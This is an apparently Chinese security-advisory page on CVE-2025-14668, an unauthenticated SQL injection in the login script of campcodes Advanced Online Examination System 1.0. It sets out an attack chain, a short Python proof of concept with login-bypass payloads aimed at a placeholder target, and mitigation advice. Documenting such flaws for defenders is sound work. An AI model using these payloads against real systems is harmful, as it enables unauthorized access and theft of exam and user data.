CVE-2025-14668 CVSS 7.3 高危

CVE-2025-14668 campcodes在线考试系统loginExe.php SQL注入漏洞

披露日期: 2025-12-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14668

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

campcodes Advanced Online Examination System 1.0

漏洞概述

CVE-2025-14668是campcodes公司开发的Advanced Online Examination System（高级在线考试系统）1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于/query/loginExe.php文件的Username参数处理逻辑中，攻击者可通过构造恶意的SQL语句实现未授权访问系统。由于该漏洞无需认证即可远程利用，且CVSS评分达到7.3（高危），对系统机密性、完整性和可用性均造成潜在威胁。此漏洞已被公开披露并可能已被广泛利用，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于登录功能模块的/query/loginExe.php文件中，具体问题出在对Username参数的用户输入没有进行充分的过滤和参数化查询处理。攻击者可以通过在Username字段中注入SQL语句来实现以下攻击：1）绕过登录验证获取未授权访问权限；2）读取数据库中的敏感信息如用户凭证、考生数据等；3）修改或删除数据库记录；4）在某些情况下可能实现操作系统命令执行。由于该漏洞属于经典的SQL注入类型（Error-based或Boolean-based blind SQL injection），攻击者可以通过自动化工具快速利用此漏洞。登录功能作为系统入口点，一旦被攻破将导致整个考试系统的数据泄露和业务中断。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标网站使用campcodes Advanced Online Examination System 1.0

STEP 2

步骤2

定位入口：访问/query/loginExe.php登录页面

STEP 3

步骤3

漏洞探测：在Username参数中注入SQL payloads测试注入点

STEP 4

步骤4

认证绕过：利用SQL注入payload绕过登录验证获取管理员权限

STEP 5

步骤5

数据窃取：读取数据库中的用户信息、考试数据等敏感内容

STEP 6

步骤6

持久化控制：创建后门账户或修改现有账户维持长期访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-14668 SQL Injection PoC
# Target: campcodes Advanced Online Examination System 1.0
# File: /query/loginExe.php
# Parameter: Username

target_url = "http://target-site.com/query/loginExe.php"

# Basic authentication bypass using SQL injection
payloads = [
    "admin' OR '1'='1",
    "admin' UNION SELECT NULL--",
    "admin' OR 1=1-- -",
    "' OR '1'='1' --",
]

for payload in payloads:
    data = {
        'Username': payload,
        'Password': 'any'
    }
    try:
        response = requests.post(target_url, data=data, timeout=10)
        if 'success' in response.text.lower() or response.status_code == 200:
            print(f"[+] Potential vulnerability with payload: {payload}")
            print(f"[+] Response: {response.text[:500]}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

影响范围

campcodes Advanced Online Examination System 1.0

防御指南

临时缓解措施

立即在Web应用防火墙中添加针对/query/loginExe.php Username参数的SQL注入防护规则，限制该接口的访问频率和来源IP。同时建议临时禁用该登录功能或使用备用认证方式，待官方发布安全补丁后再恢复生产环境使用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14668
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14668
3 Details https://www.cvedetails.com/cve/CVE-2025-14668/
4 VulDB https://vuldb.com/cve/CVE-2025-14668
5 Link https://github.com/gravity123123/CVE/issues/1
6 Link https://vuldb.com/?ctiid.336400
7 Link https://vuldb.com/?id.336400
8 Link https://vuldb.com/?submit.714806
9 Link https://www.campcodes.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表